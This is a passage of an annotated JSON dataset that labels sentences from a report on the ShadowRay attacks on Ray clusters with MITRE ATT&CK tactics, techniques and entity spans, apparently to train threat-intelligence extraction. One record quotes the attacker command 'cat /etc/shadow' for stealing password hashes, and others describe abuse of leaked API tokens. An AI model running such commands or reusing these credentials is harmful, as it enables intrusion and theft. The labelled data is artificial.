machine", "start": 369, "end": 389, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s48-9ef792", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "[8].", "sentence_text": "How Can Lack of Authorization Be Abused?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s49-8fe165", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "How Can Lack of Authorization Be Abused?", "sentence_text": "Ray does not include any kind of authorization in its Jobs API.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Ray does not include any kind of authorization in its Jobs API", "entities": [ { "text": "Ray", "start": 0, "end": 3, "label": "Infrastructure_Indicator" }, { "text": "Jobs API", "start": 54, "end": 62, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s50-3dc6d4", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "Ray does not include any kind of authorization in its Jobs API.", "sentence_text": "The result: anyone with dashboard network access (HTTP port 8265) could potentially invoke arbitrary jobs on the remote host, without authorization.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "invoke arbitrary jobs via port 8265", "entities": [ { "text": "HTTP port 8265", "start": 50, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "invoke arbitrary jobs", "start": 84, "end": 105, "label": "Action" }, { "text": "dashboard network access", "start": 24, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "remote host", "start": 113, "end": 124, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s51-a43b0b", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "The result: anyone with dashboard network access (HTTP port 8265) could potentially invoke arbitrary jobs on the remote host, without authorization.", "sentence_text": "According to Ray’s official documentation , the security best practices begin with the following:\n”...", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s52-f62f41", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "According to Ray’s official documentation , the security best practices begin with the following:\n”...", "sentence_text": "Security and isolation must be enforced outside of the Ray Cluster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s53-8df2cc", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "Security and isolation must be enforced outside of the Ray Cluster.", "sentence_text": "Ray expects to run in a safe network environment and to act upon trusted code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s54-3acaf2", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "Ray expects to run in a safe network environment and to act upon trusted code.", "sentence_text": "Developers and platform providers must maintain the following invariants to ensure the safe operation of Ray Clusters …” [9]\nRay includes code execution capabilities by design, so Anyscale believes the users should be responsible for its locality and security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s55-2ed8bb", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "Developers and platform providers must maintain the following invariants to ensure the safe operation of Ray Clusters …” [9]\nRay includes code execution capabilities by design, so Anyscale believes the users should be responsible for its locality and security.", "sentence_text": "The dashboard should either not be internet-facing, or be accessible only to trusted parties.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s56-38701e", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "The dashboard should either not be internet-facing, or be accessible only to trusted parties.", "sentence_text": "For example - Ray’s official Kubernetes deployment guide [10] and Kuberay’s Kubernetes operator encourage people to expose the dashboard on 0.0.0.0:", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "Ray", "start": 14, "end": 17, "label": "Infrastructure_Indicator" }, { "text": "0.0.0.0", "start": 140, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "expose", "start": 116, "end": 122, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s57-bea78d", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "For example - Ray’s official Kubernetes deployment guide [10] and Kuberay’s Kubernetes operator encourage people to expose the dashboard on 0.0.0.0:", "sentence_text": "AI experts are NOT security experts—leaving them potentially dangerously unaware of the very real risks posed by AI frameworks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s58-ee3f57", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "AI experts are NOT security experts—leaving them potentially dangerously unaware of the very real risks posed by AI frameworks.", "sentence_text": "Without authorization for Ray’s Jobs API, the API can be exposed to remote code execution attacks when not following best practices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "API can be exposed to remote code execution attacks", "entities": [ { "text": "Ray’s Jobs API", "start": 26, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "authorization", "start": 8, "end": 21, "label": "Action" }, { "text": "exposed to remote code execution attacks", "start": 57, "end": 97, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s59-dd69c1", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "Without authorization for Ray’s Jobs API, the API can be exposed to remote code execution attacks when not following best practices.", "sentence_text": "The CVE is tagged as “disputed” -", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s60-91817c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "The CVE is tagged as “disputed” -", "sentence_text": "In these cases, the CVE Program makes no determination as to which party is correct.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s61-fb3c4c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "In these cases, the CVE Program makes no determination as to which party is correct.", "sentence_text": "Users may not be aware of the risk, even with the most advanced solutions available in the market.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s62-b05ab3", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "Users may not be aware of the risk, even with the most advanced solutions available in the market.", "sentence_text": "While an authorization feature is recognized as a technical debt that will be addressed in a future version, its implementation is complex and may introduce breaking changes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s63-c2a7fb", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "While an authorization feature is recognized as a technical debt that will be addressed in a future version, its implementation is complex and may introduce breaking changes.", "sentence_text": "Therefore, Anyscale decided to postpone its addition and disputed CVE-2023-48022", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s65-9d40d0", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "[6].", "sentence_text": "This approach reflects Anyscale's commitment to maintaining Ray's functionality while prioritizing security enhancements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s66-7ac2da", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "This approach reflects Anyscale's commitment to maintaining Ray's functionality while prioritizing security enhancements.", "sentence_text": "This decision also underscores the complexity of balancing security and usability in software development, highlighting the importance of careful consideration in implementing changes to critical systems like Ray and other open-source components with network access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s67-a12b16", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "This decision also underscores the complexity of balancing security and usability in software development, highlighting the importance of careful consideration in implementing changes to critical systems like Ray and other open-source components with network access.", "sentence_text": "Lack of Visibility Due to the disputes surrounding whether it constituted a vulnerability, ShadowRay ( CVE-2023-48022 ) did not appear in several databases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s68-279f08", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "Lack of Visibility Due to the disputes surrounding whether it constituted a vulnerability, ShadowRay ( CVE-2023-48022 ) did not appear in several databases.", "sentence_text": "This created a blind spot: security teams around the world had no idea that they could be at risk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s69-ade002", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "This created a blind spot: security teams around the world had no idea that they could be at risk.", "sentence_text": "Let’s look at how ShadowRay is portrayed by MITRE and OSV, for example.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s71-f4d688", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "MITRE:", "sentence_text": "While receiving a critical score of 9.8, it is currently tagged as “disputed” on MITRE [7] .The description explains why:\nAnyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "remote attacker to execute arbitrary code via the job submission API", "entities": [ { "text": "remote attacker", "start": 160, "end": 175, "label": "ThreatActor" }, { "text": "critical score of 9.8", "start": 18, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "Anyscale Ray 2.6.3 and 2.8.0", "start": 122, "end": 150, "label": "Infrastructure_Indicator" }, { "text": "job submission API", "start": 210, "end": 228, "label": "Infrastructure_Indicator" }, { "text": "execute arbitrary code", "start": 179, "end": 201, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s72-273e1d", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "While receiving a critical score of 9.8, it is currently tagged as “disputed” on MITRE [7] .The description explains why:\nAnyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API.", "sentence_text": "We opened an issue to understand why.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s73-c8c727", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "We opened an issue to understand why.", "sentence_text": "This means that this disputed CVE is actually a Shadow Vulnerability [14]  - one that has already been leveraged by attackers and will be leveraged at increasing rates.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "disputed CVE has already been leveraged by attackers", "entities": [ { "text": "attackers", "start": 116, "end": 125, "label": "ThreatActor" }, { "text": "leveraged", "start": 138, "end": 147, "label": "Action" }, { "text": "disputed CVE", "start": 21, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "Shadow Vulnerability", "start": 48, "end": 68, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s74-46ee3f", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "This means that this disputed CVE is actually a Shadow Vulnerability [14]  - one that has already been leveraged by attackers and will be leveraged at increasing rates.", "sentence_text": "CVEs tagged as “Disputed” with a high vulnerability score (9.8) are very interesting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s75-bfb472", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "CVEs tagged as “Disputed” with a high vulnerability score (9.8) are very interesting.", "sentence_text": "While invisible to scanning tools, they can pose massive risks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s76-f6605b", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "While invisible to scanning tools, they can pose massive risks.", "sentence_text": "Exploited Ray clusters in the wild: What sensitive data was compromised?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s77-96e3fd", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "Exploited Ray clusters in the wild: What sensitive data was compromised?", "sentence_text": "When attackers get their hands on a Ray production cluster, it is a jackpot.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "compromise a Ray production cluster", "entities": [ { "text": "attackers", "start": 5, "end": 14, "label": "ThreatActor" }, { "text": "Ray production cluster", "start": 36, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "get their hands on", "start": 15, "end": 33, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s78-fe1506", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "When attackers get their hands on a Ray production cluster, it is a jackpot.", "sentence_text": "A trove of sensitive information has been leaked via the compromised servers.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Sensitive information was exfiltrated from compromised servers in the Ray production cluster.", "entities": [ { "text": "has been leaked via the compromised servers", "start": 33, "end": 76, "label": "Action" }, { "text": "compromised servers", "start": 57, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s79-f8e455", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "A trove of sensitive information has been leaked via the compromised servers.", "sentence_text": "Let’s dive into the specific information we uncovered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s80-1d8657", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "Let’s dive into the specific information we uncovered.", "sentence_text": "AI Production Workloads were compromised, meaning an attacker could affect an AI model's integrity or accuracy, steal models, and infect models during the training phase.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565", "name": "Data Manipulation" } ], "procedure": "compromised AI Production Workloads to affect integrity, steal models, or infect models", "entities": [ { "text": "attacker", "start": 53, "end": 61, "label": "ThreatActor" }, { "text": "AI Production Workloads ", "start": 0, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "AI model's integrity or accuracy", "start": 78, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "models", "start": 118, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "training phase", "start": 155, "end": 169, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 29, "end": 40, "label": "Action" }, { "text": "affect", "start": 68, "end": 74, "label": "Action" }, { "text": "steal", "start": 112, "end": 117, "label": "Action" }, { "text": "infect models", "start": 130, "end": 143, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s81-461060", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "AI Production Workloads were compromised, meaning an attacker could affect an AI model's integrity or accuracy, steal models, and infect models during the training phase.", "sentence_text": "Impacted organizations came from many industries, including medical companies, video analytics companies, elite educational institutions, and many more.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1586", "name": "Compromise Accounts" } ], "procedure": "None", "entities": [ { "text": "medical companies", "start": 60, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "ideo analytics companies", "start": 80, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "elite educational institutions", "start": 106, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "Impacted", "start": 0, "end": 8, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s82-0cd878", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "Impacted organizations came from many industries, including medical companies, video analytics companies, elite educational institutions, and many more.", "sentence_text": "‍\nProduction DB Credentials were exposed, allowing attackers to download complete databases silently.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "download databases using exposed credentials", "entities": [ { "text": "attackers", "start": 51, "end": 60, "label": "ThreatActor" }, { "text": "download complete databases", "start": 64, "end": 91, "label": "Action" }, { "text": "Production DB Credentials", "start": 2, "end": 27, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s83-07511a", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "‍\nProduction DB Credentials were exposed, allowing attackers to download complete databases silently.", "sentence_text": "On some machines, attackers could modify the database or encrypt it with ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "modify or encrypt databases with ransomware", "entities": [ { "text": "attackers", "start": 18, "end": 27, "label": "ThreatActor" }, { "text": "modify the database", "start": 34, "end": 53, "label": "Action" }, { "text": "encrypt it with ransomware", "start": 57, "end": 83, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s84-a5cbd3", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "On some machines, attackers could modify the database or encrypt it with ransomware.", "sentence_text": "Passwords\n- We saw evidence that the attackers have stolen password hashes from the machines - using a simple cat /etc/shadow, which was successfully executed multiple times in the job history.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.008", "name": "/etc/passwd and /etc/shadow" } ], "procedure": "stolen password hashes using cat /etc/shadow", "entities": [ { "text": "attackers", "start": 37, "end": 46, "label": "ThreatActor" }, { "text": "password hashes", "start": 59, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "machines", "start": 84, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "cat /etc/shadow", "start": 110, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "job history", "start": 181, "end": 192, "label": "Infrastructure_Indicator" }, { "text": "stolen", "start": 52, "end": 58, "label": "Action" }, { "text": "executed", "start": 150, "end": 158, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s85-daf805", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "Passwords\n- We saw evidence that the attackers have stolen password hashes from the machines - using a simple cat /etc/shadow, which was successfully executed multiple times in the job history.", "sentence_text": "Private SSH keys - We have found several private SSH keys that can be used by attackers to connect to more machines from the same VM image template (like AMI), reaching more compute capability for crypto-mining campaigns or simply gaining persistence in the environment.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.004", "name": "Private Keys" } ], "procedure": "used private SSH keys to connect to more machines for crypto-mining or persistence", "entities": [ { "text": "attackers", "start": 78, "end": 87, "label": "ThreatActor" }, { "text": "Private SSH keys", "start": 0, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "VM image template", "start": 130, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "AMI", "start": 154, "end": 157, "label": "Infrastructure_Indicator" }, { "text": "compute capability", "start": 174, "end": 192, "label": "Infrastructure_Indicator" }, { "text": "connect to more machines", "start": 91, "end": 115, "label": "Action" }, { "text": "crypto-mining campaigns", "start": 197, "end": 220, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s86-ac1a14", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "Private SSH keys - We have found several private SSH keys that can be used by attackers to connect to more machines from the same VM image template (like AMI), reaching more compute capability for crypto-mining campaigns or simply gaining persistence in the environment.", "sentence_text": "OpenAI Tokens\n- We found OpenAI tokens that attackers could use to gain access to OpenAI accounts, which could be used to drain the impacted company’s credits on the OpenAI platform.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "use OpenAI tokens to gain access and drain credits", "entities": [ { "text": "attackers", "start": 44, "end": 53, "label": "ThreatActor" }, { "text": "OpenAI tokens", "start": 25, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "OpenAI accounts", "start": 82, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "OpenAI platform", "start": 166, "end": 181, "label": "Infrastructure_Indicator" }, { "text": "gain access", "start": 67, "end": 78, "label": "Action" }, { "text": "drain the impacted company’s credits", "start": 122, "end": 158, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s87-789bd6", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "OpenAI Tokens\n- We found OpenAI tokens that attackers could use to gain access to OpenAI accounts, which could be used to drain the impacted company’s credits on the OpenAI platform.", "sentence_text": "The compromised tokens we found were all disclosed to OpenAI through the official bug bounty program [15].", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s88-5fdcf1", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "The compromised tokens we found were all disclosed to OpenAI through the official bug bounty program [15].", "sentence_text": "HuggingFace Tokens\n- (access to private repositories) - We found HuggingFace tokens that enable adding and overriding existing models.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.001", "name": "Stored Data Manipulation" } ], "procedure": "enable adding and overriding existing models using HuggingFace tokens", "entities": [ { "text": "HuggingFace Tokens", "start": 0, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "private repositories", "start": 32, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "models", "start": 127, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "enable adding and overriding", "start": 89, "end": 117, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s89-568888", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "HuggingFace Tokens\n- (access to private repositories) - We found HuggingFace tokens that enable adding and overriding existing models.", "sentence_text": "Attackers could use the account’s repositories for supply chain attacks, potentially reaching other machines by uploading models to the platform or overriding existing ones.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.002", "name": "Compromise Software Supply Chain" } ], "procedure": "uploading models or overriding existing ones for supply chain attacks", "entities": [ { "text": "Attackers", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "account’s repositories", "start": 24, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "models", "start": 122, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "supply chain attacks", "start": 51, "end": 71, "label": "Action" }, { "text": "reaching other machines", "start": 85, "end": 108, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s90-8238db", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "Attackers could use the account’s repositories for supply chain attacks, potentially reaching other machines by uploading models to the platform or overriding existing ones.", "sentence_text": "Stripe Tokens\n- We found Stripe tokens that attackers could use to drain payment accounts by signing their transactions on the live platform.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "use Stripe tokens to drain payment accounts by signing transactions", "entities": [ { "text": "attackers", "start": 44, "end": 53, "label": "ThreatActor" }, { "text": "drain payment accounts", "start": 67, "end": 89, "label": "Action" }, { "text": "Stripe tokens", "start": 25, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "live platform", "start": 127, "end": 140, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s91-cc3f91", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "Stripe Tokens\n- We found Stripe tokens that attackers could use to drain payment accounts by signing their transactions on the live platform.", "sentence_text": "‍\nSlack Tokens\n- We found Slack tokens that attackers could use to read an impacted organization’s Slack messages or send arbitrary messages to certain channels on Slack.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "use Slack tokens to read messages or send arbitrary messages", "entities": [ { "text": "attackers", "start": 44, "end": 53, "label": "ThreatActor" }, { "text": "Slack tokens", "start": 26, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "Slack messages", "start": 99, "end": 113, "label": "Infrastructure_Indicator" }, { "text": "channels", "start": 152, "end": 160, "label": "Infrastructure_Indicator" }, { "text": "read", "start": 67, "end": 71, "label": "Action" }, { "text": "send arbitrary messages", "start": 117, "end": 140, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s93-2a1d7d", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "‍", "sentence_text": "The Financials: What Is the Collective Value of the Compromised Machines?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s94-2d050e", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "The Financials: What Is the Collective Value of the Compromised Machines?", "sentence_text": "Most of the GPU models we found compromised are currently out of stock and are hard to get.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "GPU models found compromised", "entities": [ { "text": "GPU models", "start": 12, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 32, "end": 43, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s95-bebc7f", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "Most of the GPU models we found compromised are currently out of stock and are hard to get.", "sentence_text": "For example, the A6000 GPUs from the machine above are out of stock on NVIDIA’s website:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s97-2ffc35", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "‍", "sentence_text": "As of now, Oligo has found hundreds of compromised clusters.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "clusters", "start": 51, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 39, "end": 50, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s98-5cb9a6", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "As of now, Oligo has found hundreds of compromised clusters.", "sentence_text": "Each cluster consists of many nodes, which are machines connected to the cluster over the network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s99-b82f8a", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "Each cluster consists of many nodes, which are machines connected to the cluster over the network.", "sentence_text": "The on-demand price of a GPU machine depends mostly on the GPU type and memory.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s100-e52d51", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "The on-demand price of a GPU machine depends mostly on the GPU type and memory.", "sentence_text": "At the time of writing, GPU on-demand prices on AWS can reach an annual cost of $858,480 per machine The total amount of machines and compute power that might have been compromised can be estimated to be worth almost a billion USD, based on the clusters we observed in the last few weeks alone.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "machines and compute power that might have been compromised", "entities": [ { "text": "GPU", "start": 24, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "AWS", "start": 48, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "machines", "start": 121, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "compute power", "start": 134, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "clusters", "start": 245, "end": 253, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 169, "end": 180, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s101-069a59", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "At the time of writing, GPU on-demand prices on AWS can reach an annual cost of $858,480 per machine The total amount of machines and compute power that might have been compromised can be estimated to be worth almost a billion USD, based on the clusters we observed in the last few weeks alone.", "sentence_text": "Attackers are doing the same math.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s102-07d8ef", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "Attackers are doing the same math.", "sentence_text": 